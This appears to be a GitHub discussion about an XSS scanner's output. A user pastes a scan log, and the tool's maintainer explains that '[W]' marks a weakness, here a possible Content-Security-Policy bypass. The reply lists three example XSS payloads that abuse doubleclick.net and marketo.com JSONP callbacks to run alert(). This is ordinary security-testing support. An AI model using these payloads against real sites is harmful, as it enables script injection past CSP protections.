What is [W]??

[SAGEof6iixPATHS]

I am seeing this when i ran on a website:

[] Target URL: https://www.target.coml/page/anotherpage?overviewPage=FUZZ
[] Valid target [ code:301 / size:162 ]
[] Using dictionary mining option [list=GF-Patterns] 📚⛏
[] Using DOM mining option 📦⛏
[] Start BAV(Basic Another Vulnerability) analysis / [sqli, ssti, OpenRedirect] 🔍
[] Start static analysis.. 🔍
[] Start parameter analysis.. 🔍
[I] Found 1 testing point in DOM Mining
[] Static analysis done ✓ting routines
[] Parameter analysis done ✓
[] BAV analysis done ✓Waiting routines
[I] X-Frame-Options is SAMEORIGIN
[I] Strict-Transport-Security is max-age=31536000 ; includeSubDomains
[I] Content-Type is text/html
[I] Content-Security-Policy is report-uri /cspreport; frame-src https://acestream.me https://.bazaarvoice.com https://.bbvms.com https://.bookingbug.com https://.bruynzeelhomeproducts.nl https://.configuratoren.nl https://.ctfassets.net https://.doubleclick.net https://.expivi.dev https://.expivi.net https://.facebook.com https://.facebook.net https://.target.com https://.target.com https://targetservice.com https://.targetservice.com https://.h-ip.nl https://h-ip.nl https://.hetmooistegordijn.nl https://.hotjar.com https://.iesnare.com https://inboxstorage.eu https://.inboxstorage.eu https://.juicebv.nl https://.karwei.nl https://.karweimontageservices.nl https://karweimontageservices.nl https://.kastendesigner.nl https://.leadfamly.com https://.lundia.nl https://.marketo.com https://.mopinion.com https://.optimizely.com https://.picarioserver.com https://.sentimo.nl https://.svtrd.com https://.telemos.nl https://.trendiy.com https://.wepublish.com https://.xidoor.com https://.youtube.be https://.youtube.com https://.zoofy.nl; frame-ancestors 'self' folder.target.com
[W] BypassCSP: .doubleclick.net .marketo.com
Needs manual testing. please refer to it. https://t.co/lElLxtainw?amp=1
[] Generate XSS payload and optimization.Optimization.. 🛠
[] Added your blind XSS (payload.xss.ht)
[] Start XSS Scanning.. with 37 queries 🗡
[*] Finish :D

Is that because of status code??(301) But there are some 200 too... Let me know

[hahwul]

Hi @SAGEof6iixPATHS ,
Thank you for discussions!

W is weakness. I think the above it detected the possibility of a detour of CSP(Content-Security-Policy). Typically, the detection of XSS is either R(Reflected) or V(Verified). You can think of W as just a reference 😁

[W] BypassCSP: .doubleclick.net .marketo.com

Case of CSP Bypassing patterns

doubleclick.net

"><script+src="https://googleads.g.doubleclick.net/pagead/conversion/1036918760/wcm?callback=alert(1337)"></script>

marketo.com

"><script+src="http://app-sjint.marketo.com/index.php/form/getKnownLead?callback=alert()"></script>
"><script+src="http://app-e.marketo.com/index.php/form/getKnownLead?callback=alert()"></script>

If you have any more questions, please reply! Enjoy your rest of the day!